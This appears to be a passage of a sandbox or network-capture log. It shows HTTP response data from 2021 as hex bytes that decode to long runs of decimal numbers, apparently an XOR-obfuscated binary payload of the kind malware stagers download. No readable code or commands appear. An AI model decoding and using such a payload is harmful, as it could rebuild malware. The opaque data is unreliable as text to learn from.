                                                                                              2021-09-27 18:27:27 UTC152INData Raw: 20 32 33 35 20 32 30 39 20 32 34 31 20 39 38 20 31 32 33 20 31 38 30 20 32 32 39 20 31 37 36 20 31 38 33 20 31 39 31 20 32 32 34 20 36 31 20 31 32 34 20 35 32 20 31 34 31 20 31 34 37 20 39 20 32 35 30 20 31 35 36 20 39 37 20 31 30 37 20 32 32 30 20 31 32 36 20 32 35 20 32 32 32 20 36 32 20 38 35 20 31 36 20 32 30 35 20 32 31 34 20 38 35 20 32 33 37 20 32 32 20 32 35 34 20 31 38 34 20 31 32 37 20 37 38 20 31 30 33 20 35 36 20 31 39 38 20 31 34 20 31 31 38 20 31 34 33 20 31 34 35 20 31 32 34 20 31 33 20 39 36 20 34 37 20 32 30 38 20 33 33 20 31 31 35 20 31 32 31 20 31 31 38 20 31 33 37 20 32 34 37 20 37 30 20 31 33 31 20 38 31 20 31 32 32 20 31 20 32 38 20 38 30 20 31 31 34 20 31 36 20 32 30 35 20 32 31 34 20 32 36 20 35 39 20 31 34 37 20 39 36 20 31 35 33
                                                                                              Data Ascii: 235 209 241 98 123 180 229 176 183 191 224 61 124 52 141 147 9 250 156 97 107 220 126 25 222 62 85 16 205 214 85 237 22 254 184 127 78 103 56 198 14 118 143 145 124 13 96 47 208 33 115 121 118 137 247 70 131 81 122 1 28 80 114 16 205 214 26 59 147 96 153
                                                                                              2021-09-27 18:27:27 UTC156INData Raw: 31 20 32 33 30 20 32 31 30 20 32 32 33 20 32 34 30 20 38 37 20 35 35 20 33 39 20 31 35 34 20 38 30 20 35 38 20 32 33 32 20 32 32 32 20 37 34 20 31 35 34 20 34 36 20 32 30 37 20 31 34 35 20 39 32 20 31 39 30 20 30 20 32 34 38 20 31 35 33 20 32 33 34 20 32 35 34 20 31 33 30 20 38 34 20 39 39 20 34 39 20 32 30 34 20 32 33 20 32 30 35 20 32 31 34 20 39 33 20 31 32 30 20 39 36 20 32 30 31 20 32 33 35 20 33 35 20 32 31 32 20 31 38 32 20 38 34 20 34 39 20 38 35 20 35 37 20 31 39 30 20 38 31 20 35 37 20 31 35 33 20 34 39 20 32 30 32 20 32 30 36 20 31 37 37 20 32 32 32 20 32 33 33 20 31 37 35 20 31 31 30 20 31 38 33 20 31 35 31 20 31 36 32 20 37 37 20 32 34 30 20 36 30 20 31 31 30 20 31 30 37 20 39 33 20 31 39 20 38 31 20 35 34 20 32 31 30 20 32 31 31 20 31 35 30
                                                                                              Data Ascii: 1 230 210 223 240 87 55 39 154 80 58 232 222 74 154 46 207 145 92 190 0 248 153 234 254 130 84 99 49 204 23 205 214 93 120 96 201 235 35 212 182 84 49 85 57 190 81 57 153 49 202 206 177 222 233 175 110 183 151 162 77 240 60 110 107 93 19 81 54 210 211 150
                                                                                              2021-09-27 18:27:27 UTC159INData Raw: 35 20 31 30 39 20 31 31 32 20 35 30 20 31 39 20 31 30 33 20 31 30 31 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 34 38 20 34 38 20 35 30 20 35 35 20 33 20 32 30 35 20 32 31 35 20 31 31 34 20 31 32 31 20 34 35 20 34 38 20 35 30 20 35 34 20 31 37 34 20 31 31 35 20 37 30 20 31 30 39 20 31 31 34 20 35 30 20 34 38 20 35 31 20 35 34 20 38 34 20 31 31 34 20 31 36 35 20 31 30 39 20 31 31 32 20 35 30 20 31 31 39 20 35 30 20 35 34 20 38 34 20 31 36 35 20 31 31 37 20 31 30 39 20 31 31 32 20 32 32 36 20 34 39 20 35 30 20 35 34 20 31 35 32 20 31 31 35 20 31 31 37 20 31 30 39 20 31 31 39 20 35 30 20 34 38 20 35 30 20 32 30 30 20 38 35 20 31 31 34 20 31 31 37 20 31 32 33 20 31 31 32 20 35 30 20 34 38 20 31 30 34 20 35 34 20 38 34 20 31 31 34 20 31 31 36
                                                                                              Data Ascii: 5 109 112 50 19 103 101 84 114 117 109 112 48 48 50 55 3 205 215 114 121 45 48 50 54 174 115 70 109 114 50 48 51 54 84 114 165 109 112 50 119 50 54 84 165 117 109 112 226 49 50 54 152 115 117 109 119 50 48 50 200 85 114 117 123 112 50 48 104 54 84 114 116
                                                                                              2021-09-27 18:27:27 UTC164INData Raw: 38 37 20 36 33 20 32 31 36 20 36 32 20 34 38 20 38 34 20 34 39 20 31 32 30 20 31 33 33 20 31 32 34 20 35 32 20 34 38 20 31 32 34 20 35 39 20 31 38 38 20 31 32 36 20 31 31 35 20 31 30 39 20 33 36 20 36 33 20 32 31 36 20 36 32 20 34 38 20 38 34 20 31 36 20 31 32 30 20 31 33 33 20 31 32 34 20 35 32 20 34 38 20 39 33 20 35 39 20 31 33 20 31 31 34 20 31 31 35 20 31 30 39 20 32 34 35 20 36 33 20 31 30 35 20 35 30 20 34 38 20 38 34 20 32 35 32 20 31 32 30 20 35 32 20 31 31 32 20 35 32 20 34 38 20 31 36 31 20 35 39 20 31 33 20 31 31 34 20 31 31 35 20 31 30 39 20 32 33 34 20 36 33 20 31 30 35 20 35 30 20 34 38 20 38 34 20 32 31 31 20 31 32 30 20 35 32 20 31 31 32 20 35 32 20 34 38 20 31 35 34 20 35 39 20 31 33 20 31 31 34 20 31 31 35 20 31 30 39 20 31 39 32 20 36
                                                                                              Data Ascii: 87 63 216 62 48 84 49 120 133 124 52 48 124 59 188 126 115 109 36 63 216 62 48 84 16 120 133 124 52 48 93 59 13 114 115 109 245 63 105 50 48 84 252 120 52 112 52 48 161 59 13 114 115 109 234 63 105 50 48 84 211 120 52 112 52 48 154 59 13 114 115 109 192 6
                                                                                              2021-09-27 18:27:27 UTC168INData Raw: 20 34 35 20 31 35 32 20 35 34 20 36 36 20 31 31 34 20 31 33 32 20 31 31 32 20 32 31 38 20 35 30 20 35 34 20 35 30 20 34 37 20 31 31 36 20 32 30 35 20 31 31 37 20 31 30 37 20 31 31 32 20 37 20 31 36 20 32 34 36 20 35 34 20 38 32 20 31 31 34 20 33 36 20 37 37 20 31 38 33 20 35 30 20 35 34 20 35 30 20 31 31 31 20 31 31 37 20 31 38 31 20 31 31 37 20 31 30 37 20 31 31 32 20 32 30 39 20 31 38 20 35 36 20 35 35 20 38 32 20 31 31 34 20 31 33 38 20 37 39 20 31 38 30 20 35 30 20 35 34 20 35 30 20 34 35 20 31 31 39 20 32 30 35 20 31 31 37 20 31 30 37 20 31 31 32 20 35 20 31 39 20 31 35 32 20 35 34 20 38 32 20 31 31 34 20 33 38 20 37 38 20 31 32 37 20 35 31 20 35 34 20 35 30 20 38 39 20 31 31 39 20 31 32 35 20 31 31 36 20 31 30 37 20 31 31 32 20 31 38 35 20 31 39 20
                                                                                              Data Ascii: 45 152 54 66 114 132 112 218 50 54 50 47 116 205 117 107 112 7 16 246 54 82 114 36 77 183 50 54 50 111 117 181 117 107 112 209 18 56 55 82 114 138 79 180 50 54 50 45 119 205 117 107 112 5 19 152 54 82 114 38 78 127 51 54 50 89 119 125 116 107 112 185 19
                                                                                              2021-09-27 18:27:27 UTC172INData Raw: 20 34 39 20 35 35 20 31 30 32 20 31 37 38 20 32 20 32 34 33 20 35 34 20 31 31 34 20 35 39 20 32 34 30 20 31 31 34 20 31 35 31 20 31 31 38 20 34 39 20 32 20 32 34 32 20 36 30 20 32 30 32 20 35 32 20 35 33 20 31 30 32 20 31 37 38 20 31 30 33 20 32 34 33 20 35 34 20 31 31 34 20 36 31 20 38 30 20 35 30 20 34 38 20 35 30 20 35 34 20 36 36 20 31 31 34 20 31 34 39 20 31 31 37 20 39 39 20 35 30 20 34 39 20 35 30 20 31 33 34 20 31 31 36 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 33 35 20 34 30 20 35 38 20 34 34 20 31 36 20 31 31 34 20 31 31 39 20 31 30 39 20 31 31 36 20 31 39 20 34 38 20 35 30 20 35 34 20 38 34 20 39 37 20 31 31 37 20 39 38 20 31 30 36 20 31 32 32 20 34 38 20 34 38 20 35 34 20 37 32 20 38 33 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20
                                                                                              Data Ascii: 49 55 102 178 2 243 54 114 59 240 114 151 118 49 2 242 60 202 52 53 102 178 103 243 54 114 61 80 50 48 50 54 66 114 149 117 99 50 49 50 134 116 114 117 109 112 35 40 58 44 16 114 119 109 116 19 48 50 54 84 97 117 98 106 122 48 48 54 72 83 117 109 112 50
                                                                                              2021-09-27 18:27:27 UTC176INData Raw: 31 30 38 20 36 36 20 32 30 32 20 31 30 38 20 36 32 20 35 30 20 32 34 38 20 37 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 20 31 31 35 20 37 35 20 30 20 32 34 37 20 35 35 20 34 20 31 31 34 20 32 39 20 39 31 20 31 31 32 20 35 30 20 34 38 20 35 30 20 38 30 20 38 37 20 32 30 30 20 36 39 20 31 30 34 20 31 31 33 20 39 36 20 34 38 20 32 31 30 20 30 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 32 32 20 34 39 20 32 31 30 20 32 20 31 31 20 38 35 20 33 33 20 31 31 37 20 39 33 20 37 31 20 35 30 20 34 38 20 35 30 20 35 34 20 35 30 20 31 31 33 20 31 35 35 20 39 33 20 31 38 37 20 35 31 20 31 30 30 20 35 30 20 32 33 30 20 39 39 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 32 20 34 38 20 32 30 33 20 36 20 32 30 30 20 31 31 34 20 33 33 20 31 30 39 20 31
                                                                                              Data Ascii: 108 66 202 108 62 50 248 7 54 84 114 117 11 115 75 0 247 55 4 114 29 91 112 50 48 50 80 87 200 69 104 113 96 48 210 0 84 114 117 109 22 49 210 2 11 85 33 117 93 71 50 48 50 54 50 113 155 93 187 51 100 50 230 99 114 117 109 112 52 48 203 6 200 114 33 109 1
                                                                                              2021-09-27 18:27:27 UTC180INData Raw: 20 38 34 20 31 31 34 20 31 30 30 20 31 30 39 20 39 33 20 31 32 36 20 36 34 20 34 38 20 31 38 38 20 38 34 20 37 34 20 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 33 35 20 35 34 20 34 35 20 36 32 20 35 20 31 31 31 20 32 35 31 20 35 30 20 31 32 20 38 36 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 32 34 20 31 31 32 20 32 34 37 20 31 32 34 20 32 31 38 20 35 32 20 32 31 36 20 31 31 34 20 31 20 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 33 32 20 38 34 20 39 35 20 35 36 20 31 35 37 20 31 31 34 20 31 38 38 20 34 38 20 32 31 38 20 38 32 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 30 32 20 35 30 20 31 32 39 20 31 32 37 20 32 30 34 20 38 36 20 32 32 37 20 31 31 37 20 35 33 20 32 31 20 35 30 20 34 38 20 35 30 20 35 34 20 36 36 20 31 31 34 20 31 30
                                                                                              Data Ascii: 84 114 100 109 93 126 64 48 188 84 74 17 109 112 50 48 35 54 45 62 5 111 251 50 12 86 54 84 114 117 124 112 247 124 218 52 216 114 1 9 112 50 48 50 32 84 95 56 157 114 188 48 218 82 84 114 117 109 102 50 129 127 204 86 227 117 53 21 50 48 50 54 66 114 10
                                                                                              2021-09-27 18:27:27 UTC184INData Raw: 32 20 33 30 20 31 31 38 20 31 31 32 20 31 30 38 20 31 30 38 20 31 38 32 20 34 38 20 35 30 20 35 34 20 38 34 20 32 34 34 20 31 30 39 20 31 35 38 20 31 30 36 20 38 35 20 34 38 20 35 32 20 35 35 20 31 36 20 32 34 36 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 31 38 32 20 34 32 20 31 39 37 20 37 38 20 32 33 34 20 31 31 36 20 31 30 37 20 31 31 33 20 31 37 30 20 31 38 30 20 35 30 20 35 34 20 38 34 20 31 31 34 20 32 34 33 20 31 30 39 20 31 32 31 20 38 39 20 31 37 32 20 35 30 20 34 39 20 38 35 20 31 39 38 20 32 34 31 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 31 37 39 20 35 34 20 31 30 39 20 32 35 20 31 38 20 31 30 39 20 31 31 39 20 35 31 20 31 38 30 20 31 38 33 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 32 33 35 20 31 31 32 20 39 31 20 39 31 20 31 30 30
                                                                                              Data Ascii: 2 30 118 112 108 108 182 48 50 54 84 244 109 158 106 85 48 52 55 16 246 117 109 112 50 182 42 197 78 234 116 107 113 170 180 50 54 84 114 243 109 121 89 172 50 49 85 198 241 109 112 50 48 179 54 109 25 18 109 119 51 180 183 54 84 114 117 235 112 91 91 100
                                                                                              2021-09-27 18:27:27 UTC188INData Raw: 38 31 20 31 37 37 20 31 31 30 20 38 31 20 37 39 20 31 31 36 20 39 20 32 31 39 20 35 30 20 34 38 20 35 30 20 35 34 20 36 36 20 31 31 34 20 32 33 36 20 32 33 38 20 34 36 20 35 35 20 31 34 20 35 31 20 31 37 38 20 32 35 35 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 33 36 20 34 38 20 31 33 35 20 31 38 31 20 34 39 20 31 31 39 20 37 34 20 31 30 38 20 31 37 36 20 31 35 33 20 34 38 20 35 30 20 35 34 20 38 34 20 31 30 30 20 31 31 37 20 31 32 38 20 32 34 33 20 39 34 20 35 33 20 31 31 34 20 35 35 20 35 32 20 32 32 32 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 35 34 20 34 32 20 31 39 37 20 37 38 20 31 37 32 20 31 31 37 20 34 36 20 31 31 33 20 31 38 32 20 31 35 36 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 39 20 31 31 30 20 31 38 39 20 31 38 32 20 38 37
                                                                                              Data Ascii: 81 177 110 81 79 116 9 219 50 48 50 54 66 114 236 238 46 55 14 51 178 255 114 117 109 112 36 48 135 181 49 119 74 108 176 153 48 50 54 84 100 117 128 243 94 53 114 55 52 222 117 109 112 50 54 42 197 78 172 117 46 113 182 156 50 54 84 114 19 110 189 182 87
                                                                                              2021-09-27 18:27:27 UTC191INData Raw: 20 35 32 20 39 35 20 35 31 20 32 32 36 20 32 33 32 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 31 20 34 38 20 31 30 36 20 31 37 34 20 35 33 20 31 31 36 20 34 20 31 30 38 20 31 36 38 20 31 34 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 36 20 31 31 37 20 31 36 35 20 32 33 32 20 39 31 20 35 34 20 37 30 20 35 35 20 32 32 30 20 32 30 35 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 39 20 35 30 20 35 34 20 32 30 35 20 32 31 20 31 31 37 20 32 34 20 31 31 33 20 31 33 38 20 32 34 30 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 35 20 31 30 39 20 36 34 20 31 37 31 20 38 37 20 35 30 20 36 37 20 38 35 20 31 35 30 20 31 38 30 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 31 20 35 34 20 32 34 20 32 33 35 20 32 36 20 31 30 37 20 35 20 35 31 20 32
                                                                                              Data Ascii: 52 95 51 226 232 114 117 109 112 51 48 106 174 53 116 4 108 168 140 48 50 54 84 116 117 165 232 91 54 70 55 220 205 117 109 112 50 49 50 54 205 21 117 24 113 138 240 50 54 84 114 115 109 64 171 87 50 67 85 150 180 109 112 50 48 51 54 24 235 26 107 5 51 2
                                                                                              2021-09-27 18:27:27 UTC196INData Raw: 38 34 20 31 31 32 20 35 30 20 34 39 20 35 30 20 31 38 33 20 31 31 30 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 31 33 39 20 31 30 20 35 30 20 35 34 20 38 36 20 31 31 34 20 31 36 30 20 38 37 20 31 31 32 20 35 30 20 34 39 20 35 30 20 31 32 33 20 31 30 36 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 31 37 31 20 31 34 20 35 30 20 35 34 20 38 35 20 31 31 34 20 39 36 20 38 32 20 31 31 32 20 35 30 20 34 39 20 35 30 20 38 37 20 31 30 37 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 32 33 39 20 31 35 20 35 30 20 35 34 20 38 35 20 31 31 34 20 36 34 20 34 34 20 31 31 32 20 35 30 20 35 30 20 35 30 20 31 30 33 20 32 31 20 31 31 34 20 31 31 37 20 31 31 30 20 31 31 32 20 39 35 20 31 31 33 20 35 30 20 35 34 20 38 35 20 31 31 34 20 32 30 34 20 34 34 20
                                                                                              Data Ascii: 84 112 50 49 50 183 110 114 117 108 112 139 10 50 54 86 114 160 87 112 50 49 50 123 106 114 117 108 112 171 14 50 54 85 114 96 82 112 50 49 50 87 107 114 117 108 112 239 15 50 54 85 114 64 44 112 50 50 50 103 21 114 117 110 112 95 113 50 54 85 114 204 44
                                                                                              2021-09-27 18:27:27 UTC200INData Raw: 31 32 20 35 30 20 34 39 20 35 30 20 38 33 20 33 38 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 32 20 31 37 39 20 36 36 20 35 30 20 35 34 20 38 35 20 31 31 34 20 31 38 38 20 33 30 20 31 31 32 20 35 30 20 34 39 20 35 30 20 35 35 20 33 32 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 31 32 37 20 36 38 20 35 30 20 35 34 20 38 35 20 31 31 34 20 32 34 30 20 32 35 20 31 31 32 20 35 30 20 35 30 20 35 30 20 31 35 31 20 33 32 20 31 31 34 20 31 31 37 20 31 31 30 20 31 31 32 20 31 34 33 20 36 38 20 35 30 20 35 34 20 38 30 20 31 31 34 20 31 37 32 20 32 35 20 31 31 32 20 35 30 20 35 33 20 35 30 20 31 39 35 20 33 32 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 33 31 20 36 39 20 35 30 20 35 34 20 38 35 20 31 31 34 20 31 32 20 32 34 20 31 31 32 20 35 30 20 35
                                                                                              Data Ascii: 12 50 49 50 83 38 114 117 111 112 179 66 50 54 85 114 188 30 112 50 49 50 55 32 114 117 108 112 127 68 50 54 85 114 240 25 112 50 50 50 151 32 114 117 110 112 143 68 50 54 80 114 172 25 112 50 53 50 195 32 114 117 108 112 31 69 50 54 85 114 12 24 112 50 5
                                                                                              2021-09-27 18:27:27 UTC204INData Raw: 20 31 34 33 20 35 31 20 32 34 37 20 38 34 20 31 34 34 20 36 39 20 38 30 20 31 31 33 20 32 34 33 20 34 38 20 32 32 30 20 36 20 31 35 39 20 31 31 35 20 31 39 36 20 31 30 39 20 31 37 36 20 31 36 20 31 37 34 20 35 34 20 31 36 37 20 38 34 20 31 39 31 20 32 34 31 20 31 30 20 31 31 32 20 31 36 33 20 34 38 20 32 33 31 20 31 37 38 20 35 31 20 31 31 34 20 32 32 38 20 31 30 39 20 31 37 34 20 31 38 32 20 38 37 20 35 30 20 31 36 37 20 38 34 20 31 33 30 20 32 34 31 20 31 30 20 31 31 32 20 31 36 33 20 34 38 20 34 38 20 31 37 39 20 35 31 20 31 31 34 20 33 36 20 31 30 34 20 31 33 31 20 34 30 20 38 37 20 35 30 20 31 35 20 38 34 20 31 32 39 20 31 31 31 20 31 30 20 31 31 32 20 32 37 20 34 39 20 31 39 33 20 34 34 20 34 36 20 31 31 37 20 33 36 20 31 30 39 20 31 33 31 20 34 30
                                                                                              Data Ascii: 143 51 247 84 144 69 80 113 243 48 220 6 159 115 196 109 176 16 174 54 167 84 191 241 10 112 163 48 231 178 51 114 228 109 174 182 87 50 167 84 130 241 10 112 163 48 48 179 51 114 36 104 131 40 87 50 15 84 129 111 10 112 27 49 193 44 46 117 36 109 131 40
                                                                                              2021-09-27 18:27:27 UTC208INData Raw: 20 32 32 38 20 31 30 34 20 31 32 33 20 31 35 39 20 31 34 38 20 36 33 20 33 31 20 38 32 20 39 39 20 32 31 36 20 31 20 31 31 34 20 32 35 31 20 34 39 20 31 39 33 20 34 34 20 38 31 20 31 31 35 20 31 32 34 20 31 31 31 20 38 34 20 31 35 39 20 39 32 20 34 38 20 32 35 35 20 38 35 20 37 35 20 32 31 36 20 31 30 34 20 31 31 33 20 32 35 31 20 34 39 20 31 32 34 20 31 35 35 20 38 31 20 31 31 35 20 31 38 30 20 31 30 38 20 33 39 20 31 35 39 20 31 33 30 20 36 33 20 39 35 20 38 31 20 34 37 20 32 31 36 20 31 37 34 20 31 32 35 20 39 31 20 35 33 20 38 34 20 31 35 35 20 31 35 37 20 31 32 37 20 34 34 20 31 30 34 20 32 33 37 20 34 36 20 32 35 35 20 36 33 20 31 31 31 20 38 31 20 32 20 32 31 36 20 31 38 31 20 31 32 35 20 31 30 37 20 35 33 20 37 34 20 31 35 35 20 37 35 20 31 31 39
                                                                                              Data Ascii: 228 104 123 159 148 63 31 82 99 216 1 114 251 49 193 44 81 115 124 111 84 159 92 48 255 85 75 216 104 113 251 49 124 155 81 115 180 108 39 159 130 63 95 81 47 216 174 125 91 53 84 155 157 127 44 104 237 46 255 63 111 81 2 216 181 125 107 53 74 155 75 119
                                                                                              2021-09-27 18:27:27 UTC212INData Raw: 37 20 31 33 31 20 34 30 20 35 33 20 35 31 20 32 31 35 20 38 36 20 32 31 36 20 31 39 36 20 31 31 30 20 31 31 36 20 32 31 31 20 35 30 20 32 34 35 20 31 35 36 20 38 37 20 31 31 38 20 34 31 20 31 30 39 20 33 36 20 31 35 33 20 38 37 20 35 30 20 31 38 33 20 38 36 20 32 30 32 20 32 32 33 20 31 30 20 31 31 32 20 32 33 35 20 35 33 20 31 33 33 20 31 33 35 20 31 35 20 39 37 20 31 30 30 20 31 30 35 20 31 38 33 20 31 33 31 20 38 32 20 33 33 20 34 37 20 38 30 20 31 36 37 20 31 39 36 20 32 30 35 20 31 31 32 20 32 33 35 20 35 33 20 31 37 35 20 34 32 20 36 31 20 39 37 20 31 38 38 20 31 30 39 20 31 34 32 20 31 35 34 20 36 34 20 33 33 20 32 33 39 20 38 31 20 31 34 39 20 31 39 36 20 32 30 20 39 39 20 39 34 20 34 38 20 32 33 34 20 31 35 39 20 31 31 30 20 31 32 30 20 32 35 20
                                                                                              Data Ascii: 7 131 40 53 51 215 86 216 196 110 116 211 50 245 156 87 118 41 109 36 153 87 50 183 86 202 223 10 112 235 53 133 135 15 97 100 105 183 131 82 33 47 80 167 196 205 112 235 53 175 42 61 97 188 109 142 154 64 33 239 81 149 196 20 99 94 48 234 159 110 120 25
                                                                                              2021-09-27 18:27:27 UTC223INData Raw: 20 32 37 20 32 36 20 33 20 33 20 35 30 20 31 31 35 20 39 33 20 39 31 20 33 36 20 32 39 20 32 37 20 38 20 33 30 20 37 30 20 34 38 20 39 37 20 37 39 20 33 39 20 36 20 31 36 20 30 20 39 34 20 31 31 33 20 39 35 20 39 35 20 37 30 20 35 39 20 32 38 20 31 36 20 33 20 34 20 31 32 37 20 39 35 20 38 36 20 38 33 20 35 36 20 31 31 34 20 34 38 20 39 20 32 35 20 37 30 20 39 35 20 36 34 20 31 31 36 20 33 38 20 32 39 20 32 20 33 30 20 31 37 20 38 30 20 39 32 20 38 37 20 31 31 39 20 33 32 20 36 20 37 20 34 20 31 38 20 37 31 20 36 38 20 38 37 20 35 34 20 31 37 20 32 32 20 32 38 20 32 35 20 33 31 20 36 34 20 31 31 34 20 36 34 20 38 39 20 33 35 20 31 20 32 30 20 31 35 20 32 38 20 38 37 20 39 39 20 37 30 20 38 37 20 33 32 20 32 33 20 31 31 37 20 34 36 20 33 31 20 39 32 20 36
                                                                                              Data Ascii: 27 26 3 3 50 115 93 91 36 29 27 8 30 70 48 97 79 39 6 16 0 94 113 95 95 70 59 28 16 3 4 127 95 86 83 56 114 48 9 25 70 95 64 116 38 29 2 30 17 80 92 87 119 32 6 7 4 18 71 68 87 54 17 22 28 25 31 64 114 64 89 35 1 20 15 28 87 99 70 87 32 23 117 46 31 92 6
                                                                                              2021-09-27 18:27:27 UTC239INData Raw: 32 33 20 34 33 20 32 31 20 31 31 39 20 39 20 37 30 20 39 34 20 32 34 20 35 38 20 30 20 32 31 20 36 36 20 39 33 20 36 20 38 35 20 31 31 20 38 34 20 38 31 20 37 32 20 32 38 20 35 32 20 31 32 30 20 34 20 37 35 20 31 30 31 20 39 39 20 32 30 20 35 34 20 34 31 20 32 32 20 31 32 33 20 38 39 20 31 31 39 20 39 36 20 31 38 20 32 35 20 32 20 32 30 20 35 33 20 31 31 39 20 36 20 31 31 37 20 35 20 31 31 32 20 38 36 20 36 36 20 39 34 20 35 36 20 36 39 20 39 38 20 38 35 20 37 39 20 31 30 32 20 34 35 20 31 36 20 33 38 20 34 32 20 31 30 33 20 39 31 20 37 34 20 38 37 20 37 20 32 39 20 37 32 20 31 30 39 20 39 34 20 38 31 20 38 33 20 37 30 20 38 39 20 33 38 20 31 31 34 20 38 36 20 38 30 20 31 20 39 33 20 39 34 20 31 32 37 20 39 36 20 33 30 20 35 39 20 33 20 35 30 20 33 32 20
                                                                                              Data Ascii: 23 43 21 119 9 70 94 24 58 0 21 66 93 6 85 11 84 81 72 28 52 120 4 75 101 99 20 54 41 22 123 89 119 96 18 25 2 20 53 119 6 117 5 112 86 66 94 56 69 98 85 79 102 45 16 38 42 103 91 74 87 7 29 72 109 94 81 83 70 89 38 114 86 80 1 93 94 127 96 30 59 3 50 32
                                                                                              2021-09-27 18:27:27 UTC255INData Raw: 31 30 38 20 33 20 36 38 20 34 33 20 39 20 31 32 30 20 36 37 20 39 32 20 34 20 31 31 20 37 20 33 30 20 33 38 20 32 34 20 37 20 31 32 37 20 31 32 34 20 31 31 36 20 32 31 20 33 38 20 31 38 20 38 30 20 37 37 20 35 30 20 31 39 20 31 35 20 37 31 20 35 31 20 36 38 20 36 38 20 33 32 20 31 37 20 31 30 30 20 38 39 20 31 32 33 20 36 36 20 31 30 33 20 35 35 20 37 20 34 37 20 32 36 20 37 31 20 31 31 33 20 32 20 31 32 30 20 31 30 39 20 34 32 20 37 20 32 36 20 37 37 20 31 35 20 34 38 20 31 37 20 31 31 20 33 37 20 31 36 20 35 37 20 34 37 20 35 37 20 39 33 20 31 32 31 20 31 30 36 20 31 31 31 20 32 36 20 32 30 20 36 33 20 31 20 36 37 20 37 34 20 39 20 31 32 36 20 31 32 36 20 33 37 20 34 38 20 33 34 20 33 35 20 34 39 20 31 35 20 31 33 20 35 30 20 32 31 20 31 30 35 20 33 20
                                                                                              Data Ascii: 108 3 68 43 9 120 67 92 4 11 7 30 38 24 7 127 124 116 21 38 18 80 77 50 19 15 71 51 68 68 32 17 100 89 123 66 103 55 7 47 26 71 113 2 120 109 42 7 26 77 15 48 17 11 37 16 57 47 57 93 121 106 111 26 20 63 1 67 74 9 126 126 37 48 34 35 49 15 13 50 21 105 3
                                                                                              2021-09-27 18:27:27 UTC271INData Raw: 20 33 39 20 31 20 39 39 20 37 33 20 33 20 37 31 20 32 39 20 37 39 20 31 31 37 20 37 38 20 37 37 20 36 37 20 39 33 20 31 30 32 20 37 38 20 31 39 20 32 37 20 35 36 20 34 34 20 36 34 20 37 20 39 32 20 31 30 32 20 31 31 35 20 33 32 20 32 39 20 33 37 20 36 31 20 33 38 20 34 20 39 38 20 31 31 36 20 31 32 31 20 36 31 20 32 36 20 36 35 20 34 31 20 34 31 20 39 37 20 30 20 37 31 20 37 38 20 33 38 20 31 30 20 33 37 20 33 34 20 36 38 20 36 38 20 31 31 33 20 33 20 31 32 36 20 31 30 32 20 32 34 20 36 37 20 35 36 20 37 37 20 35 30 20 31 39 20 31 35 20 37 31 20 39 37 20 32 31 20 37 20 36 31 20 37 20 38 35 20 31 31 37 20 37 31 20 36 38 20 37 20 32 38 20 36 37 20 33 38 20 35 20 37 30 20 31 30 32 20 31 32 36 20 31 30 31 20 39 37 20 34 35 20 32 36 20 36 31 20 35 31 20 39 34
                                                                                              Data Ascii: 39 1 99 73 3 71 29 79 117 78 77 67 93 102 78 19 27 56 44 64 7 92 102 115 32 29 37 61 38 4 98 116 121 61 26 65 41 41 97 0 71 78 38 10 37 34 68 68 113 3 126 102 24 67 56 77 50 19 15 71 97 21 7 61 7 85 117 71 68 7 28 67 38 5 70 102 126 101 97 45 26 61 51 94
                                                                                              2021-09-27 18:27:27 UTC287INData Raw: 20 33 20 34 20 32 34 20 35 34 20 31 32 37 20 38 39 20 37 20 39 37 20 35 33 20 38 36 20 32 20 38 35 20 31 37 20 31 32 34 20 39 20 31 31 37 20 31 31 33 20 35 36 20 36 30 20 36 35 20 33 37 20 36 35 20 39 39 20 31 33 20 31 35 20 35 34 20 31 31 39 20 37 39 20 34 20 38 20 36 34 20 39 35 20 31 30 35 20 32 32 20 31 30 30 20 31 31 20 30 20 35 35 20 33 30 20 33 32 20 31 32 33 20 31 30 36 20 31 30 34 20 36 34 20 31 30 33 20 32 36 20 33 37 20 33 33 20 33 35 20 36 20 38 37 20 31 35 20 31 31 20 38 34 20 38 31 20 37 32 20 32 38 20 36 35 20 30 20 39 34 20 33 20 31 20 31 30 30 20 37 30 20 35 35 20 34 32 20 38 20 39 31 20 31 30 30 20 31 31 20 31 31 39 20 35 39 20 36 31 20 32 36 20 35 37 20 36 32 20 36 37 20 39 35 20 38 35 20 31 31 20 31 30 35 20 31 31 34 20 38 36 20 38 30
                                                                                              Data Ascii: 3 4 24 54 127 89 7 97 53 86 2 85 17 124 9 117 113 56 60 65 37 65 99 13 15 54 119 79 4 8 64 95 105 22 100 11 0 55 30 32 123 106 104 64 103 26 37 33 35 6 87 15 11 84 81 72 28 65 0 94 3 1 100 70 55 42 8 91 100 11 119 59 61 26 57 62 67 95 85 11 105 114 86 80
